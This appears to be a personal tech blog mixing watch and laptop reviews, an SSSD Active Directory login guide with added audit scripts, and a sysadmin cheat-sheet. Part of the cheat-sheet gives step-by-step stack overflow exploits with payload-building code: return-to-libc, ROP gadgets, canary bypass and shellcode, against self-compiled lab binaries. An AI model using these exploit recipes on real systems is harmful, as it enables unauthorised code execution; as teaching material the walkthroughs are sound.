.random.tech.reviews.

Sunday, August 30, 2020

Thoughts on the Garmin Instinct Solar sports watch

These notes are in the context of my search for a solar powered ABC watch with an accurate step counter.

My hope was that the Instinct Solar would be like the Casio solar powered watches, where with normal exposure to natural and artificial light (indoors and outdoors) it never runs out of battery. Unfortunately that is not the case.

On the Garmin watch, the solar charging works only in direct sunlight. It does not charge at all indoors, from either natural or artificial light, and very little outdoors in overcast conditions. You really need clear skies and the watch facing the sun for it to do its magic. With the heart rate sensor turned off and only the step counter and ABC sensors active, you still need 3 hours of charging in direct sunlight for the watch to never run out of battery.

The Instinct Solar has a few different watch faces with a maximum of four customizable data fields. Unfortunately there is no Connect IQ support, so I can't create my own.

There's also the concern of the battery deteriorating over time. I observed that on my Garmin Fenix 3 watch. It started with 2 weeks of battery life when new and in less than 2 years it got to lasting only about a week. Casio watches don't seem to have this issue, since a 10-year-old Pro Trek is still always charged (battery indicator shows "High") regardless of direct sunlight exposure.

Then there's the Casio G-Shock GBD-H1000, which is a solar powered GPS enabled running watch with ABC sensors that in theory should never run out of power as long as you don't use the GPS. The step counter on it however is so inaccurate that it's basically useless. Where Garmin watches count about 1k steps a day when I'm indoors and not leaving the house, the Casio counted ~10k steps! If only Garmin could license Casio's solar charging or Casio Garmin's step counter tech :)

Monday, February 06, 2017

Corporate Blacklist


Date | Name | Reason | Reference
06-Feb-2017 | Vizio | VIZIO’s televisions transmit information about what a consumer is watching on a second-by-second basis. The information is stored forever. | link

Friday, September 11, 2015

Linux AD Authentication without joining the domain

If you want to authenticate to your Linux machine using your Microsoft AD accounts you can achieve that without having to join the domain.

Here's how you set it up on Ubuntu 14.04.

Install SSSD:
apt-get install sssd

Note: On Ubuntu the above command automatically edits /etc/nsswitch.conf as well as the appropriate PAM configuration files; you might have to do this yourself if you're installing on other Linux distros.

Set up SSSD by putting this in /etc/sssd/sssd.conf:

[sssd]
config_file_version = 2
services = nss, pam
domains = MY_AD_DOMAIN.COM

[nss]
# the following 2 lines let you override the "Unix Attributes" set on your AD (if any) and effectively eliminate the need to change anything on the AD server
default_shell = /bin/bash
override_homedir = /home/%u
filter_users = root
filter_groups = root
reconnection_retries = 3

[pam]

[domain/MY_AD_DOMAIN.COM]
#debug_level = 7
enumerate = False
case_sensitive = False
# always check with the AD server if the credentials are valid
cache_credentials = False
min_id = 100

# Providers
id_provider = ldap
auth_provider = ldap
access_provider = ldap
ldap_access_order = filter, expire
ldap_account_expire_policy = ad
# allow only users in a particular AD security group
ldap_access_filter = memberOf=CN=Admins,OU=Groups,DC=MY_AD_DOMAIN,DC=com
chpass_provider = ldap

# figure out the UID and GID for a linux user from the AD objectSID
ldap_id_mapping = True
# depending on how big the objectSID is on your AD server you might need to tweak the 3 lines below to avoid collisions
ldap_idmap_range_min = 100000
ldap_idmap_range_max = 2000100000
ldap_idmap_range_size = 800000

ldap_id_use_start_tls = True
# never = don't verify the server certificate, which leaves the TLS connection open to interception; once you can obtain the CA certificate from your AD server and install it on your Linux machine, switch this to demand
ldap_tls_reqcert = never
ldap_schema = ad
ldap_tls_cacertdir = /etc/openldap/certs

ldap_search_base = OU=Users,OU=Objects,DC=MY_AD_DOMAIN,DC=com

# LDAP Class settings
ldap_user_object_class = user
ldap_user_name = sAMAccountName
ldap_user_principal = userPrincipalName

# LDAP connection settings
ldap_uri = ldaps://MY_AD_SERVER:MY_AD_PORT
# use a service account to bind
ldap_default_bind_dn = CN=MY_SERVICE_ACCOUNT,OU=Users,OU=Objects,DC=MY_AD_DOMAIN,DC=com
ldap_default_authtok_type = obfuscated_password
ldap_default_authtok = MY_OBFUSCATED_PASSWORD
###

SSSD refuses to start unless the config file is owned by root with permissions 600 (it contains the bind credential), so:
chmod 600 /etc/sssd/sssd.conf
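An added audit script (not part of the original post) that parses an sssd.conf like the one above and flags the settings worth a second look, chiefly ldap_tls_reqcert = never and a missing ldap_access_filter, together with the root/0600 requirement on the file. SAMPLE_SSSD_CONF is a constructed copy of the relevant lines, and the defaults assumed for absent keys are noted in the code.

```python
import configparser
import os
import stat

# Constructed sample: the relevant lines of the sssd.conf above, placeholders kept.
SAMPLE_SSSD_CONF = """\
[sssd]
config_file_version = 2
services = nss, pam
domains = MY_AD_DOMAIN.COM

[domain/MY_AD_DOMAIN.COM]
cache_credentials = False
id_provider = ldap
auth_provider = ldap
access_provider = ldap
ldap_access_filter = memberOf=CN=Admins,OU=Groups,DC=MY_AD_DOMAIN,DC=com
ldap_id_use_start_tls = True
ldap_tls_reqcert = never
ldap_uri = ldaps://MY_AD_SERVER:MY_AD_PORT
ldap_default_bind_dn = CN=MY_SERVICE_ACCOUNT,OU=Users,OU=Objects,DC=MY_AD_DOMAIN,DC=com
ldap_default_authtok_type = obfuscated_password
ldap_default_authtok = MY_OBFUSCATED_PASSWORD
"""


def audit_sssd_text(text):
    """Return a list of findings for every [domain/...] section of an sssd.conf.
    Defaults assumed when a key is absent follow the sssd-ldap/sssd.conf man pages:
    ldap_tls_reqcert=hard, access_provider=permit, ldap_default_authtok_type=password."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if not section.startswith("domain/"):
            continue
        dom = cp[section]
        uri = dom.get("ldap_uri", "")
        start_tls = dom.get("ldap_id_use_start_tls", "false").lower() == "true"
        if not (uri.startswith("ldaps://") or start_tls):
            findings.append(f"{section}: ldap_uri '{uri}' without ldaps:// or start_tls; "
                            "the bind password and user credentials cross the wire in clear text")
        reqcert = dom.get("ldap_tls_reqcert", "hard").lower()
        if reqcert in ("never", "allow"):
            findings.append(f"{section}: ldap_tls_reqcert={reqcert} skips server certificate "
                            "validation; install the AD CA cert and use demand/hard")
        if dom.get("access_provider", "permit") == "ldap" and not dom.get("ldap_access_filter"):
            findings.append(f"{section}: access_provider=ldap but no ldap_access_filter; "
                            "every AD account is allowed to log in")
        if dom.get("ldap_default_authtok") and \
                dom.get("ldap_default_authtok_type", "password") != "obfuscated_password":
            findings.append(f"{section}: bind password stored in clear text; "
                            "generate ldap_default_authtok with sss_obfuscate")
    return findings


def permission_problems(uid, mode):
    """sssd refuses to start unless sssd.conf is owned by root and is mode 0600,
    because the file carries the bind credential. `mode` is the permission bits only."""
    problems = []
    if uid != 0:
        problems.append(f"owner uid is {uid}, expected 0 (root)")
    if mode != 0o600:
        problems.append(f"mode is {oct(mode)}, expected 0o600")
    return problems


def check_conf_file(path="/etc/sssd/sssd.conf"):
    """Audit a real sssd.conf on disk: permission problems plus content findings."""
    st = os.stat(path)
    problems = permission_problems(st.st_uid, stat.S_IMODE(st.st_mode))
    with open(path) as fh:
        problems.extend(audit_sssd_text(fh.read()))
    return problems


if __name__ == "__main__":
    # run against the constructed sample and a deliberately wrong owner/mode
    for line in audit_sssd_text(SAMPLE_SSSD_CONF) + permission_problems(1000, 0o644):
        print("WARN", line)
```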

Wednesday, September 14, 2011

Dell Precision M6600 quick review


Quick specs
  • Intel Core i7 2820QM 2.30GHz
  • 4x4GB DDR3 RAM @ 1333MHz
  • 2x2.5" 7200RPM 500GB SATA HDDs in RAID1 setup
  • Nvidia Quadro 3000M w/ 2GB RAM and Intel HD Graphics 3000
  • 17.3" FHD 16:9 LED (UltraSharp) multi-touch screen (1920x1080) w/ stylus, webcam and mic
  • Intel Centrino Ultimate-N 6300 802.11 AGN wifi + bluetooth
  • Slot Load DVD+-R/RW w/Double Layer
  • 9-cell 3760mAh 97Wh battery
  • Weight 7.77lb (3.6kg)
Details
Performance
The laptop comes with Windows 7 Professional 64-bit. It boots from power-on to login screen in 45 sec (in a RAID1 setup with 2x500GB 7200rpm SATA disks). Shutdown takes 14 seconds from clicking the button (while logged in) to power-off. Going to sleep takes 7 seconds and waking up 3 seconds. The OS and all the bundled software take about 43gigs and the recovery partition is 752megs.

Windows experience index:

On AC power in "Ultra Performance" profile - 5.2

Super PI for 1mil and 8mil (on AC power):

CrystalDiskMark and HD Tune Pro:


PCMark05:
On AC power with Nvidia videocard in "Ultra Performance" profile - 10394
On battery power with Nvidia videocard in "Ultra Performance" profile - 8726
On battery power with Intel videocard in "Power Saving" profile - 5335 (about 64% slower)

3DMark06:

On AC power with Nvidia videocard in "Ultra Performance" mode - 14208

On battery power with Nvidia videocard in "Ultra Performance" mode - 2766

On battery power with Intel videocard in "Power Saving" mode - 2526 (9% slower)

What's in the box
AC adapter, manuals, stylus, resource media CD.

Friday, February 04, 2011

HP Envy 14 (1110NR) review



Quick specs
  • Intel Core i5 460M 2.53GHz
  • 2x2GB DDR3 RAM @ 667MHz
  • 2.5" 7200RPM 640GB Samsung SATA HDD
  • ATI Mobility Radeon HD 5650 w/ 1GB RAM and Intel GMA HD Graphics
  • 14.5" 16:9 LED (HP Brightview Infinity) screen (1366x768) w/ webcam and stereo mic
  • Intel Centrino Advanced-N 6200 802.11 AGN wifi + bluetooth
  • Super Multi 8X DVD+-R/RW w/Double Layer
  • 8-cell 3760mAh 59Wh battery
  • Weight 5.4lb (2.44kg)

Design
This is arguably the best looking consumer HP laptop right now. The minimalistic approach, the simple design and the quality materials make it stand out. It has an all-aluminum body that feels well built (except for the battery cover, see below).

Ports and layout:
Like most laptops these days, this one has all the ports on the sides.


On the right side we have: USB/e-SATA port, HDMI, mini DisplayPort, Kensington lock, network and AC. It's worth noting that the power and drive activity lights are also on this side. They're out of direct sight.

On the left side we have: slot-loading optical drive, 2 USBs, headphone/mic jack, headphone jack.

The speakers are located in the front of the laptop. They provide mediocre sound with very little bass. I was expecting more from the "beatsaudio" edition of this laptop. Turns out what it does is allow you to "hear what the artist hear" if you buy a pair of beats headphones. I'd much rather have better speakers than this gimmick that makes you buy special headphones. Also, in the front right corner of the laptop there's an SD/MMC card reader.

Display
This laptop has a 14.5" LED (HP Brightview Infinity) edge-to-edge glossy screen with a 16:9 aspect ratio and a resolution of 1366x768. I feel this is not enough and that 1600x900 would look much better. On top it has a webcam with great video quality and 2 microphones. The horizontal viewing angles are OK while the vertical ones are mediocre. Also, being glossy, it works as a mirror when dark surfaces are displayed, so it can be challenging to view outdoors.


This is how bright the screen is compared to a Dell XPS-1645 (on the left) that has an RGB LED display, both on maximum brightness:


Keyboard and touchpad:

The touchpad, even though it's big and matte, is not good. Its major flaw is that it does not separate the "buttons" from the touchpad area. It's all one big touch-sensitive surface with the bottom part also playing the role of the buttons. If you have a finger on the touchpad and try to click a mouse "button" with another finger, the cursor jumps to the bottom of the screen. You have to take your first finger off, click the mouse button, then resume moving the cursor. Also, the entire area of the touchpad pushes in when you perform a "button" click, which can be a little distracting too. Tapping twice on the white dot in the upper left corner disables the touchpad completely, presumably for gaming or when you're using an external mouse.


The chiclet-style backlit keyboard feels solid and does not bend or twist when typing. One strange thing I noticed is that the Ctrl key seems to play the role of the Fn button, and the Fn button needs to be pressed when you want to hit any F-keys. Changing the screen brightness, for example, is done by pressing Ctrl-F2/Ctrl-F3 (instead of Fn-F2/Fn-F3), but if you want to press Alt-F4 you have to do Fn-Alt-F4. This is how the backlight looks in the dark:


Battery and AC adapter:
The laptop came with an 8-cell 3760mAh 59Wh battery. It comes pre-installed and is located completely within the laptop's chassis, under a cover panel. The hard drive is also located here, so there's no need to unscrew anything else to replace it. The cover itself feels a little flimsy when on, as it does not fit tightly enough and can wiggle a bit when you pick up the laptop. This definitely detracts from an otherwise solid build quality.


The power adapter is not too big.


An interesting aspect of this laptop is that it has two video cards. By default, if you're on AC it uses the ATI Mobility Radeon HD 5650, but if you're on battery power it switches to the Intel HD. I wonder how inefficient the ATI video card is at saving power if HP chose to put a second one in there :)

On the software side you get Windows 7 Home Premium 64-bit. It boots from power-on to login screen in 51 sec. Shutdown takes 11 seconds from clicking the button to power-off. Going to sleep takes 6 seconds and waking up 4 seconds. The OS and all the bundled software take about 35gigs and the recovery partition is 25gigs.

Windows experience index:
On AC power in "High Performance" profile - 5.9

Super PI for 1mil and 8mil (on AC power):

CrystalDiskMark:

PCMark05:
On AC power with ATI videocard in "High Performance" profile - 8008
On battery power with ATI videocard in "High Performance" profile - 8055
On battery power with Intel videocard in "Power Saving" profile - 5505 (about 46% slower)

3DMark06:
On AC power with ATI videocard in "High Performance Mode" - 6949

On battery power with ATI videocard in "High Performance Mode" - 6948

On battery power with Intel videocard in "High Performance Mode" - 1975 (251% slower)

Wi-fi speed (on AC power):
Tested on an Asus RT-N16 b/g/n wireless router at a distance of 5 feet (2 meters).
On 802.11g it averages 1.8MB/s - approx. 30% link utilization

On 802.11n it connects at 144Mbps and averages 6.6MB/s - approx. 45% link utilization
 
What's in the box
AC adapter, manuals, 2gb sd card, cloth pouch.

Pros
- good specs
- backlit keyboard
- slot loading optical drive (on the left side too)
- aluminum case
- great build quality

Cons
- crap beats speakers (no bass at all)
- low resolution (1366x768) glossy screen
- horrible touchpad
- flimsy battery cover

Conclusion
This laptop had the potential to become HP's best yet, with its beautiful design, great aluminum body and good specs. Unfortunately it's being held back by the low screen resolution and the terrible touchpad. The flimsy battery cover also detracts from the otherwise really well-built chassis. So close guys, but no cigar. At least not yet.

Thursday, October 21, 2010

Tech Cheat-sheet

Firefox/Chrome: reload tab with javascript (no extensions)
console> win1 = window.open("https://ifconfig.io");
console> timer1 = setInterval( function(){ win1.location.href="https://ifconfig.io" }, 1*60*1000 ); // every 1 min
 
Linux: find execve("/bin/sh") rop gadget manually
bash> ldd ./mybinary
linux-vdso.so.1 =>  (0x00007ffff7ffd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c29000)
/lib64/ld-linux-x86-64.so.2 (0x0000555555554000)
bash> strings -tx /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
180543 /bin/sh
bash> objdump -M intel -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B2 execve | grep 180543 -A5
   e9421:    48 8d 3d 1b 71 09 00     lea    rdi,[rip+0x9711b]        # 180543 <_libc_intl_domainname+0x242>
   e9428:    48 8b 10                 mov    rdx,QWORD PTR [rax]
   e942b:    e8 00 bd fd ff           call   c5130 <execve>
--
--
   ea379:    48 8d 3d c3 61 09 00     lea    rdi,[rip+0x961c3]        # 180543 <_libc_intl_domainname+0x242>
   ea380:    48 8b 10                 mov    rdx,QWORD PTR [rax]
   ea383:    e8 a8 ad fd ff           call   c5130 <execve>
bash> gdb ./mybinary
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ vmmap
Start              End                Perm    Name
0x00400000         0x00401000         r-xp    /tmp/test
0x00600000         0x00601000         r--p    /tmp/test
0x00601000         0x00602000         rw-p    /tmp/test
0x00007ffff7a11000 0x00007ffff7bcf000 r-xp    /lib/x86_64-linux-gnu/libc-2.19.so
....
gdb-peda$ x/3i 0x00007ffff7a11000+0xe9421
0x7ffff7afa421 <exec_comm+1281>:    lea    rdi,[rip+0x9711b]        # 0x7ffff7b91543
0x7ffff7afa428 <exec_comm+1288>:    mov    rdx,QWORD PTR [rax]
0x7ffff7afa42b <exec_comm+1291>:    call   0x7ffff7ad6130 <__execve>

Linux: 64bit return-to-libc gets() stack overflow canary bypass # -ASLR +NX
gcc -o mybinary mybinary.c
+--------+--------+---------+-----------------+----------+------------+----------+
|AAAAAAAA|CANNARYV|QWORD PAD|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+--------+--------+---------+-----------------+----------+------------+----------+

1. find the offset N on the stack that overwrites RIP; the canary lives 16 bytes earlier
2. find address of "pop rdi;ret", system(), "sh", exit()
3. create the payload (in python)
import struct as s
sys = 0x7ffff7a57590     # system()
exi = 0x7ffff7a4d1e0     # exit()
cmd = 0x7ffff7a21dfe     # null-terminated arg for system
pad = 0x1111111111111111 # random qword
pop = 0x400643           # pop rdi; ret
# N is the offset found in step 1; "CANNARYV" is an 8-byte stand-in for the canary that gets patched to the real value in gdb (step 5)
print "A"*N + "CANNARYV" + s.pack("<Q",pad) + s.pack("<Q",pop) + s.pack("<Q",cmd) + s.pack("<Q",sys) + s.pack("<Q",exi)
4. save the pattern in a file
bash> python own.py > pattern
5. run the program in gdb and patch the canary value after gets() executes
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x000000000040059d <+0>:    push   rbp
   0x000000000040059e <+1>:    mov    rbp,rsp
   0x00000000004005a1 <+4>:    add    rsp,0xffffffffffffff80
   0x00000000004005a5 <+8>:    mov    DWORD PTR [rbp-0x74],edi
   0x00000000004005a8 <+11>:   mov    QWORD PTR [rbp-0x80],rsi
   0x00000000004005ac <+15>:   mov    rax,QWORD PTR fs:0x28
   0x00000000004005b5 <+24>:   mov    QWORD PTR [rbp-0x8],rax
   0x00000000004005b9 <+28>:   xor    eax,eax
   0x00000000004005bb <+30>:   lea    rax,[rbp-0x70]
   0x00000000004005bf <+34>:   mov    rdi,rax
   0x00000000004005c2 <+37>:   call   0x4004a0 <gets@plt>
   0x00000000004005c7 <+42>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x00000000004005cb <+46>:   xor    rdx,QWORD PTR fs:0x28
   0x00000000004005d4 <+55>:   je     0x4005db <main+62>
   0x00000000004005d6 <+57>:   call   0x400470 <__stack_chk_fail@plt>
   0x00000000004005db <+62>:   leave
   0x00000000004005dc <+63>:   ret
End of assembler dump.
gdb-peda$ break *0x00000000004005b5
gdb-peda$ break *0x00000000004005c7
gdb-peda$ run < pattern
gdb-peda$ p $rax
$1 = 0x8393371af6b62200 <- this is the canary value
gdb-peda$ continue
gdb-peda$ patch $rbp-0x8 0x8393371af6b62200
Written 8 bytes to 0x7fffffffed68
gdb-peda$ continue

Linux: 64bit return-to-libc gets() stack overflow exploit # -ASLR +NX
gcc -o mybinary -fno-stack-protector mybinary.c
+------------+-----------------+----------+------------+----------+
|AAAAAAAAAAAA|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+------------+-----------------+----------+------------+----------+

note:
on 64-bit the argument to system() needs to be in RDI
pop rdi - loads the next qword from the stack into RDI, e.g. addr("sh")
ret - jumps to the next address on the stack, e.g. addr(system)

1. find the offset N on the stack that overwrites RIP
2. find address of "pop rdi;ret" rop gadget so we can pass args to functions
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ ropsearch "pop rdi"
0x004005b3 : (b'5fc3') pop rdi; ret
3. find address of system() and exit()
gdb-peda$ print system
gdb-peda$ print exit
4. find addr of "sh" string somewhere in memory ending with NULL (0x00)
gdb-peda$ find "sh"
libc : 0x7ffff7a22c37 --> 0x6572687470006873 ('sh')
gdb-peda$ hexdump 0x7ffff7a22c37
0x00007ffff7a22c37 : 73 68 00 70 74 68 72 65 61 64 5f 63 6f 6e 64 5f sh.pthread_cond_
5. create the payload (with perl) - this will only work with gets() as strcpy() ignores NULL bytes
print "A"xN . "\xb3\x05\x40\x00\x00\x00\x00\x00" . "\x37\x2c\xa2\xf7\xff\x7f\x00\x00" . "<addr_of_system>" . "<addr_of_exit>"

Linux: ASM: argument passing to functions 32bit vs 64bit
32bit binaries pass arguments to functions on the stack:

-4  | addr(param2)
-8  | addr(param1)
-12 | addr(ret)
-16 | addr(func)


64bit binaries pass arguments to functions in registers:

RDI - first arg
RSI - second arg
RDX - third arg
RCX - fourth arg
R8 - fifth arg
R9 - sixth arg


Only the 7th+ arguments are passed on the stack.

Linux: 32bit return-to-libc gets() stack overflow exploit # +ASLR +NX
gcc -o mybinary -fno-stack-protector -m32 mybinary.c
+------------+------------+----------+-----------+
|AAAAAAAAAAAA|addr(system)|addr(exit)|addr(ENVAR)|
+------------+------------+----------+-----------+
    args      EBP

import struct as s
import subprocess as sp

# after mybinary is started and waiting for input, find the address of libc and the stack

libc = sp.Popen("cat /proc/`pidof mybinary`/maps | grep libc | head -1 | awk -F- '{ print $1 }'", shell=True, stdout=sp.PIPE).stdout.read()
stack_top = sp.Popen("cat /proc/`pidof mybinary`/maps | grep stack | awk '{ print $1 }' | awk -F- '{ print $2 }'", shell=True, stdout=sp.PIPE).stdout.read()

# find constant offset b/w libc and addr with peda "distance"

sys = hex(int(libc,16) + 262928)        # addr of system() = libc + constant offset
exi = hex(int(libc,16) + 209504)        # addr of exit() = libc + constant offset
env = hex(int(stack_top,16) - 60)       # addr of ENVAR = top of stack - some offset

  # points right at this location                                 -60 v---------------------------------+ stack_top
  # bash> cat in | env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 ENVAR="    ls -l;id;whoami;cat /root/flag" /tmp/mybinary

print "A" * 503 + s.pack("<I",int(sys,16)) + s.pack("<I",int(exi,16)) + s.pack("<I",int(env,16)) + "AAA" # python own.py > in


Linux: writing to stdin of a process after you start it
bash> mkfifo /tmp/input
bash> cat /tmp/input | myproc
bash> cat file > /tmp/input


Linux: 32bit return-to-libc stack overflow exploit # -ASLR +NX
gcc -o mybinary -fno-stack-protector -m32 mybinary.c
+--------------+--------+--------+-------------+
| AAAAAAAAAAAA |system()|ret_addr|arg_to_system|
+--------------+--------+--------+-------------+
      args      EBP

1. find the offset N on the stack that overwrites EIP
2. the payload will have to be in the format "A"xN + addr of system() + addr of exit() + addr of "sh"
3. find address of system() and exit()
(gdb) break main
(gdb) run
(gdb) print system
(gdb) print exit
4. find addr of "sh" string somewhere in memory ending with NULL (0x00)
(gdb) info proc map # vmmap in peda
process 3000
Mapped address spaces:
    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000        0x0 /tmp/test
     0x8049000  0x804a000     0x1000        0x0 /tmp/test
     0x804a000  0x804b000     0x1000     0x1000 /tmp/test
    0xf7e1e000 0xf7e1f000     0x1000        0x0
    0xf7e1f000 0xf7fca000   0x1ab000        0x0 /lib/i386-linux-gnu/libc-2.19.so
    0xf7fca000 0xf7fcc000     0x2000   0x1aa000 /lib/i386-linux-gnu/libc-2.19.so
    0xf7fcc000 0xf7fcd000     0x1000   0x1ac000 /lib/i386-linux-gnu/libc-2.19.so
    0xf7fcd000 0xf7fd0000     0x3000        0x0
    0xf7fda000 0xf7fdb000     0x1000        0x0
    0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
    0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib/i386-linux-gnu/ld-2.19.so
    0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib/i386-linux-gnu/ld-2.19.so
    0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib/i386-linux-gnu/ld-2.19.so
    0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) find 0xf7e1f000,0xf7fca000,"sh" # find "sh" in peda
0xf7e2d469
0xf7e2e3a8
...
11 patterns found.
(gdb) x/s 0xf7e2d469
0xf7e2d469:    "sh"
5. create the payload (with perl) - this will only work with gets() as strcpy() ignores NULL bytes
print "A"xN."<addr_of_system>"."<addr_of_exit>"."\x69\xd4\xe2\xf7"

Linux: shellcode repo
http://shell-storm.org/shellcode/

Linux: basic stack overflow exploit # -ASLR -NX
gcc -o mybinary -fno-stack-protector -z execstack -m32 mybinary.c
+--------------+-----+-----------+
| AAAAAAAAAAAA | RET | SHELLCODE |
+--------------+-----+-----------+
      args      EBP

Running your program with identical stacks in the terminal and in gdb:

bash> env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 /bin/bash -c "(cat exploit; cat) | /tmp/mybinary"
bash> env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 gdb /tmp/mybinary

Within gdb, make sure to unset env LINES and env COLUMNS

Linux: ASM: stack frame

Apache: mod_rewrite simulator
http://htaccess.madewithlove.be/

Apache: Turn off server signature for production
#httpd.conf
ServerSignature Off
ServerTokens Prod


AWK: Remove duplicate lines from a file:
bash> awk '!x[$0]++' file.txt

AWS: CLI: Environment variables
bash> AWS_ACCESS_KEY_ID=XXX AWS_SECRET_ACCESS_KEY=XXX aws s3 ls

AWS: ELB: Converting a certificate private key into the PEM format accepted by ELB
bash> openssl rsa -in my-openssl-pk -outform PEM > my-openssl-pk.pem

AWS: S3: URL for S3 buckets
http://bucket_name.s3.amazonaws.com/

AWS: S3: IAM policy for granting full access to a single bucket from a specific IP range
{
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
      "Resource": "arn:aws:s3:::*",
      "Condition": {
        "IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
      }
    },
    {
      "Effect": "Allow",
      "Action": "s3:*",
      "Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*" ],
      "Condition": {
        "IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
      }
    }
  ]
}


AWS: S3: Bucket policy for granting full access to a single bucket from a specific IP range
{
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
      "Resource": [ "arn:aws:s3:::*" ],
      "Condition": {
        "IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
      }
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*" ],
      "Condition": {
        "IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
      }
    }
  ]
}
Note that with "Principal": "*" the bucket policy grants these actions to anyone, including unauthenticated requests, as long as the request comes from the listed IP ranges.
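An added check, not part of the original post, that serves both the IAM policy and the bucket policy above (they share the same IpAddress condition): it normalises the aws:SourceIp CIDRs and evaluates whether a caller IP would be allowed an action on a resource. SAMPLE_POLICY is the bucket policy copied from above; "1.1.1.1/16" is taken literally, and Principal is not evaluated (with "*" every caller passes).

```python
import fnmatch
import ipaddress
import json

# Constructed sample: the bucket policy from the cheat-sheet above, verbatim.
SAMPLE_POLICY = json.loads("""
{
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
      "Resource": ["arn:aws:s3:::*"],
      "Condition": {"IpAddress": {"aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"]}}
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": ["arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
      "Condition": {"IpAddress": {"aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"]}}
    }
  ]
}
""")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def source_ip_networks(stmt):
    """Return (networks, warnings) for a statement's IpAddress/aws:SourceIp condition.
    A CIDR with host bits set (the "1.1.1.1/16" above) is normalised to its
    network address and reported, since what the author meant is ambiguous.
    networks is None when the statement carries no source-IP restriction."""
    cidrs = stmt.get("Condition", {}).get("IpAddress", {}).get("aws:SourceIp")
    if cidrs is None:
        return None, []
    nets, warnings = [], []
    for cidr in _as_list(cidrs):
        net = ipaddress.ip_network(cidr, strict=False)
        if str(net) != cidr:
            warnings.append(f"{cidr} has host bits set; evaluated as {net}")
        nets.append(net)
    return nets, warnings


def statement_allows(stmt, action, resource, source_ip):
    """True if this Allow statement covers action+resource and the caller's IP.
    Wildcards follow IAM's * and ? (actions compared case-insensitively).
    Principal is deliberately ignored: with "*" every caller, even an
    unauthenticated one, passes that check."""
    if stmt.get("Effect") != "Allow":
        return False
    if not any(fnmatch.fnmatchcase(action.lower(), a.lower()) for a in _as_list(stmt["Action"])):
        return False
    if not any(fnmatch.fnmatchcase(resource, r) for r in _as_list(stmt["Resource"])):
        return False
    nets, _ = source_ip_networks(stmt)
    if nets is None:
        return True
    ip = ipaddress.ip_address(source_ip)
    return any(ip in net for net in nets)


def policy_allows(policy, action, resource, source_ip):
    """Allow-only evaluation (the policies above contain no Deny statements)."""
    return any(statement_allows(s, action, resource, source_ip) for s in policy["Statement"])


def policy_warnings(policy):
    """Unique CIDR warnings across all statements."""
    seen = set()
    for stmt in policy["Statement"]:
        seen.update(source_ip_networks(stmt)[1])
    return sorted(seen)


if __name__ == "__main__":
    for w in policy_warnings(SAMPLE_POLICY):
        print("WARN", w)
    # 1.1.200.7 falls inside 1.1.0.0/16, so it can read objects in bucket_name
    print(policy_allows(SAMPLE_POLICY, "s3:GetObject", "arn:aws:s3:::bucket_name/secret.txt", "1.1.200.7"))
```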


AWS: RDS: MySQL: Import Issue
ERROR 1227 (42000) at line X: Access denied; you need (at least one of) the SUPER privilege(s) for this operation
If you get this error, first try setting "log_bin_trust_function_creators = 1" in the parameter group of the RDS instance you're importing into. If that does not help, then the DEFINER statement in your trigger definition is wrong. Open the sql file with vim and go to line X. See what the DEFINER statement looks like and either correct it so it matches the user you're importing as or just delete it completely (:%s/DEFINER=`user`@`host`//g). The import should work now.

AWS: RDS: MySQL: Grant all privileges to DB user
Generally "GRANT ALL ON *.*" on RDS will fail because the root account does not have SUPER user privileges. MySQL however allows the use of `%` or "_" as wildcards for the database, which will allow GRANT on all of the user-created databases and tables.
mysql> GRANT ALL ON `%`.* TO user@'%' IDENTIFIED BY 'password'; 

AWS: RDS: MySQL: Rotate mysql.general_log and mysql.slow_log table
mysql> CALL mysql.rds_rotate_general_log;
mysql> CALL mysql.rds_rotate_slow_log;

AWS: RDS: MySQL: Skip a SQL operation if replication gets stuck
1. Connect with mysql command to slave
2. CALL mysql.rds_skip_repl_error;

Git: Permanently cache credentials
For build machines it's useful to permanently cache the git service account's credentials:
bash> git config --global credential.helper store

Haproxy: Setup logging properly through rsyslogd
# haproxy.cfg
log /dev/log local1 info
###
# rsyslog.conf
# if haproxy logs are also being written to /var/log/messages you can exclude them
*.info;mail.none;authpriv.none;cron.none;local1.none /var/log/messages
###
# rsyslog.d/10-haproxy.conf
$AddUnixListenSocket /var/lib/haproxy/dev/log # if haproxy is being chrooted to /var/lib/haproxy, run: mkdir /var/lib/haproxy/dev
if $programname startswith 'haproxy' then /var/log/haproxy.log
&~
###

